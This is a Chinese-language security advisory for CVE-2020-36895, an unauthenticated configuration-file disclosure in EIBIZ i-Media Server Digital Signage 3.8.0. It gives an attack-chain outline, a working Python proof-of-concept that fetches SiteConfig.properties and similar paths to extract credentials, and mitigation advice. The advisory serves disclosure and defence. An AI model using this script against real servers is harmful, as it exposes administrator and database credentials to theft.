CVE-2020-36895 EIBIZ i-Media Server未授权配置泄露漏洞

漏洞信息

漏洞编号

CVE-2020-36895

漏洞类型

未授权配置泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EIBIZ i-Media Server Digital Signage

漏洞概述

CVE-2020-36895是EIBIZ i-Media Server Digital Signage 3.8.0版本中的一个高危安全漏洞。该漏洞属于未授权配置披露（Unauthenticated Configuration Disclosure）类型，源于应用程序对敏感配置文件的访问控制不足。攻击者可以通过直接对象引用（IDOR - Insecure Direct Object Reference）的方式，无需任何认证即可远程访问系统中的SiteConfig.properties配置文件。该文件包含敏感信息，如管理员凭据、数据库连接字符串、系统配置参数等关键信息。攻击者获取这些凭据后，可以进一步进行横向移动或完全控制受影响系统。此漏洞的CVSS评分为7.5，属于高危级别，对系统的机密性造成严重影响。

技术细节

该漏洞存在于EIBIZ i-Media Server Digital Signage 3.8.0的Web服务器组件中。应用程序在处理HTTP请求时，未对用户访问配置文件的行为进行权限验证。攻击者可以通过构造特定的HTTP GET请求，直接请求/SiteConfig.properties路径或类似的配置资源路径。由于服务器端缺少身份验证机制和访问控制检查，任何匿名用户都能够检索这些敏感文件。SiteConfig.properties文件通常包含以下敏感信息：(1) 管理员用户名和密码；(2) 数据库连接字符串，包括数据库类型、主机地址、端口、用户名和密码；(3) 系统配置参数，如邮件服务器配置、API密钥等；(4) 其他应用程序特定的敏感配置。攻击者利用此漏洞获取凭据后，可用于后续的权限提升、横向移动或数据窃取攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统为EIBIZ i-Media Server Digital Signage 3.8.0

STEP 2

步骤2

攻击者构造HTTP GET请求，直接访问敏感配置文件路径（如/SiteConfig.properties）

STEP 3

步骤3

服务器端未进行身份验证检查，直接返回配置文件内容

STEP 4

步骤4

攻击者获取SiteConfig.properties文件，包含管理员凭据、数据库连接信息等敏感数据

STEP 5

步骤5

利用获取的凭据进行后续攻击，如登录管理后台、访问数据库或执行远程代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2020-36895 PoC - Unauthenticated Configuration Disclosure
# Target: EIBIZ i-Media Server Digital Signage 3.8.0

def exploit_cve_2020_36895(target_url):
    """
    Exploit for CVE-2020-36895
    Unauthenticated configuration file disclosure vulnerability
    """
    # Common paths for configuration file disclosure
    paths = [
        '/SiteConfig.properties',
        '/config/SiteConfig.properties',
        '/WEB-INF/SiteConfig.properties',
        '/admin/SiteConfig.properties',
        '/config.properties',
        '/application.properties'
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2020-36895...\n")
    
    for path in paths:
        url = target_url.rstrip('/') + path
        try:
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200 and 'password' in response.text.lower():
                print(f"[+] Found exposed configuration at: {url}")
                print(f"[+] Status Code: {response.status_code}")
                print(f"[+] Content Length: {len(response.text)}")
                print(f"\n[+] Configuration Content:\n")
                print(response.text)
                return response.text
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    
    print("[-] No vulnerable configuration endpoints found")
    return None

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com:8080")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_cve_2020_36895(target)

影响范围

EIBIZ i-Media Server Digital Signage 3.8.0

防御指南

临时缓解措施

在正式补丁发布前，可采取以下临时缓解措施：(1) 通过网络层访问控制，限制对管理接口和配置文件的访问IP范围；(2) 在Web服务器（如Apache/Nginx）中配置规则，阻止对敏感配置路径的直接访问；(3) 临时关闭或限制未认证用户对系统资源的访问；(4) 监控和记录所有对配置文件的访问尝试，及时发现异常行为；(5) 更改配置文件中暴露的所有凭据，并确保新密码符合复杂度要求。